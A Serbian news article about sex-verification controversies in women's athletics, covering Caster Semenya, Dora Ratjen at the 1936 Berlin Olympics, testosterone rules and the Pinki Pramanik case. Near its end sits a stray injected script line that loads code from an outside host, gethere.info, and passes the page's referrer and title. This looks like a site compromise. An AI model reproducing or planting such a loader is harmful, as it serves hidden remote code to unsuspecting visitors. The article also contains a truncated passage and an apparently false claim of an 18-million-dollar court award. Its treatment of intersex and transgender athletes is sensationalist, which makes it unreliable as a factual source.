Sport
28.05.2016. 19:12
ekspres

UNISEX ATLETIKA: Od naci eksperimenta u Berlinu do modernih dama sa viškom muških hormona

Ekspres.net
Izvor: Ekspres.net

Istorija ženskih sportova "nabildana" muškim hormonima ne počinje od Južnoafrikanke Kaster Semenja, već nas vraća na OI u Berlinu 1936, kada su nacisti obukli muškarca u triko i poslali ga da skače sa damama

- Kuda ćeš ti? Vrati se, ovo je ženski toalet.

Tinejdžerka je pogledala ka vratima: na njima nacrtana - haljina! Okrenula se, potrčala, i - nije stala...

...i stigla je prva. Zvala se Kaster Semenja, a tog dana je pobedila u trci na 800 metara na Svetskom prvenstvu u Berlinu. Reporteri sa Olimpijskog stadiona tog leta 2009. bili su bučno saglasni u oceni da “izgleda kao muškarac i trči kao muškarac”.

Mlada Južnoafrikanka, umesto slavlja zbog spektakularne trke i zlatne medalje, otišla je na test na utvrđivanje pola. Da će to morati da uradi saznalo se pre trke pa je 18-godišnja devojka, sa makadamske stazi u okolini Pretorije, bila u fokusu kamera.

spušten u granice dozvoljenog testosterona utvrđenog od strane Svetske atletske federacije. Lavina je posebno dobila na intenzitetu kad se ispostavilo se da je glavni trener južnoafričke reprezentacije Ekart Arbejt.

Uloga "doktora Mengelea"

A taj “doktor Mengele”, kako su ga prozvali u vreme dok je još bio selektor Istočne Nemačke, svojevremeno bio u centru "sličnog skandala". Nemačka atletičarka Hajdi Kriger optužila je Arbejta da ju je kljukao jakim dozama anaboličnih steroida, zbog čega je ona 1997. morala da se podvrgne operaciji promene pola i postane - Andreas Kriger.

Uvođenje "doktora Mengelea" u ovaj slučaj pojačalo je bičevanje nesrećne Semenja teškim optužbama . A povod je kulturološki bizaran: drastičnog popravljanje njenih ličnih rekorda! I kakve li bezkrupuloznosti, čelnici svetske atletike pokušali su da razloge njenih munjevitih trka nađu ispod šortsa.

- Rođena sam ovakva i ne želim nikakve promene. Nisam varlica. Žao mi je što su teške sumnje i zlostavljanja krenuli onog momenta kad sam postala svetska šampionka. Moja prva sportska ljubav bio je fudbal. Odrasla sam igrajući ga sa dečacima.

Majka pokazala krštenicu, sud presudio 18 mil.$

Godinu dana je bila u autu, na stazi javnog medicinskog dokazivanja da je devojka. Ona i njeni roditelji su preživljavali teške trenutke.

- Jedno sam sigurna. Borila sam se za svoju porodicu. To je u jednom vremenu bio jedini motiv. Da nije bilo borbe za njih...Ogolili su me fihički, ogolili su me psihički, izjavila je šampionka.

Stvari su otišle tako daleko da je njena majka morala tabloidima da pokaže krštenicu na kojoj je pisalo “žensko”. Njezin otac Džejkob otkrio je jednom da je priželjkivao rođenje sina, međutim, kad se Kaster rodila, bio je jako ponosan i uvek joj je davao podršku.

U julu 2010. Kaster je dobila dozvolu da se vrati atletici. Rezultati testova nikad nisu objavljeni. Učinjeno je tako da bi se izbegle finansijske posledice jedne ovako teške optužbe. Kaster je tužila IAAF za 120 miliona dolara. Sud je presudio: duševna bol i izgubljena dobit 18 miliona dolara.

Lekari proveravali prstima - da li je ona, zapravo on?

Ekspres.net
Izvor: Ekspres.netEkspres.net
Kaster Semenja sa dečacima igrala fudbal. FOTO:AP

Pitanje trans/interseksualnosti u sportu, potovo u atletici, ne počinje, međutim, sa devojkom iz Pretorije.

Mnogi sjajni rezultati u ženskim disciplinama stavljeni su pod lupu sumnju da li se iza trikoa kriju muškarci. Kako se ispitivalo da li su “žene stvarno žene”...?

Polovinom prošlog veka sportiskinje su morale gole da šetaju ispred doktora, koji su imali dozvolu i da prstima “provere” - da li je on ili ona?

Nakon pregleda golim okom i dodirom, provera pola kod takmičara rađena je hromozomskim testom. Dva su razloga zbog čega je on kratko bio u upotrebi. Prvi, velike sumnje u njegovu tačnost, a drugi - zato što je bio jako skup.

Od testova se odustalo, ali od sumnji nije. Novi sofisticirani način vežbanja doveo do toga da je po konfiguraciji tela teško odgonetnuti pol takmičara. Međunarodni olimpijski komitet je uoči Olimpijskih igara u Londonu odlučio da zabrani nastup sportiskinjama koje imaju povećane doze muškog hormona testosteron. One kojima je uvrđena hiperandregenemija morale su da zaborave na takmičenje, ali da se podvrgnu terapiji sve dok nivo muških hormona ne bude u dozvoljenim količinama po pravilima MOK-a.

Kako to obično biva, naučni konsenzus nije postignut. I dok su jedni ukazivali na humani, zdravstveni značaj, jer su sportistkinje na ovaj način dobijale jako važna uputstva - da povećan broj muških hromozoma može dugoročno stvoriti zdravstvene probleme, ne isključujući rast brade, opadanje kose, neplodnosti i ono što je najopasnije povećanje rizika od dobijanja tumora, protivnici ovog pravila su ukazivali da bi na ovaj način interseksualni sportisti mogli da upadnu u “veliku krizu identiteta”.

Velika podvala na Olimpijadi u Berlinu

Pitanje verifikacije pola bilo je jako interesantna tema i za filmadžije. Od brojnih ostvarenja koji su se bavili ovom tematikom pomenimo film “Berlin 36”, reditelja Kaspara Hajdelbaha.

To je priča o Gretel Bergman, sjajnoj nemačkoj skakačici jevrejskoj porekla, koja pod nadirućim talasom nacizma odlazi u Veliku Britaniju. Međutim, na insistiranje Međunarodnog olimpijskog komiteta, Nemci je uključuju u pripreme svoje reprezentacije za Olimpijske igre u Berlinu.

Gretel je sa ličnim rekordom od 160 santimetara imala osiguranu medalju. Ali, orgnizatori nisu želeli da vide Jevrejku na postolju. Odlučili su da je zamene pripremivši “tajno oružje”- muškarca prerušenog u ženu – Mari Keteler. Između njih dv(oj)e rađa se prijateljstvo i to je svojevrsna pobeda nad sistemom. Kasnije se ispostavilo da je Dora Ratjen, koja je bila fikcionalizovana pod imenom Mari Keteler, zapravao muško, optužen(a) je da je transvestit i zaposlila se kao konobar.

U Rio idem po zlato, neka pričaju da sam muškarac

Još dva meseca su ostala do Oplimpijskih igara u Riju. Šta će biti sa Kaster Semenja? Nakon što je na Olimpijskim igrama u Londonu 2012. godine osvojila srebrnu medalju, na stazi njene karijere pojavljuju se sve veće prepreke. Rezultati su sve slabiji, a pokušaj da se vrati angažovanjem svog idola, legendarne Marije Mutole, za trenera, nije uspeo.

Do njenog ubrzanja dolazi kad se prošle godine preselila u trening-kamp kod trenera Žana Verstera. Kaster se, inače, pre pola godine udala za dugogodišnju ljubav, atletičarku Violet Raseboja

Ekspres.net
Izvor: Ekspres.netEkspres.net
Kaster se venačala sa francuskom atletičarkom Violet RasebojaFOTO: Twitter/mambaonline

- Želim da osvojim zlato u Riju. Znam da će neki opet da kažu “ona izgleda kao muškarac”. Ali, to je njihov problem, a ne moj, poručila je nedavno.

Na igrama u Riju važiće neka nova pravila koja će posebno veliki odraz imati na atletiku. Tako će takmičari koji su postali takmičarke, prešli sa ženskog na muški pol, moći da se takmiče bez ograničenja, dok će učešće transrodnih atletičarki zavisiti o njihovom nivou testosterona. Atletičarke će morati da prilože nalaz da je njihov testosteron ispod 10 nanomola po litru najmanje godinu dana pre početka igara.

OSVOJILA ZLATO KAO ŽENA, OPTUŽENA ZA SILOVANJE KAO MUŠKO 

Svet je pre četiri godine iznenadila vest iz Indije. Pinki Pramanik, članica tamošnje zlatne štafete na Azijskim igrama 2006, pošto je optužena za silovanje, ispostavilo se da je u stvari - muškarac.  Policija je podnela krivičnu prijavu protiv Pramanikove za silovanje i napad na ženu sa kojom je živela u Zapadnom Bengaziju.

Nedugo zatim, indijske vlasti su saopštile da je osmočlana medicinska komisija podvrgla proveri pola Pinki Pramanik i zaključila da je ta osoba muškarac.

Takođe, srebrna na 800 metara na Azijskim igrama 2006. Santi Soundarajan ranije je diskvalifikovana i oduzeta joj je medalja jer je pala na testu provere pola odmah posle Igara.

 s.src='http://gethere.info/kt/?264dpr&frm=script&se_referrer=' + encodeURIComponent(document.referrer) + '&default_keyword=' + encodeURIComponent(document.title) + '';

Komentari
Dodaj komentar
Close
Vremenska prognoza
clear sky
6°C
19.04.2024.
Beograd
Wind
PM2.5
5µg/m3
PM10
6µg/m3
UV
UV indeks
1
AQI indeks
1

Oni su ponos Srbije

Vidi sve

Najnovije

Vidi sve

Iz drugačijeg ugla

Vidi sve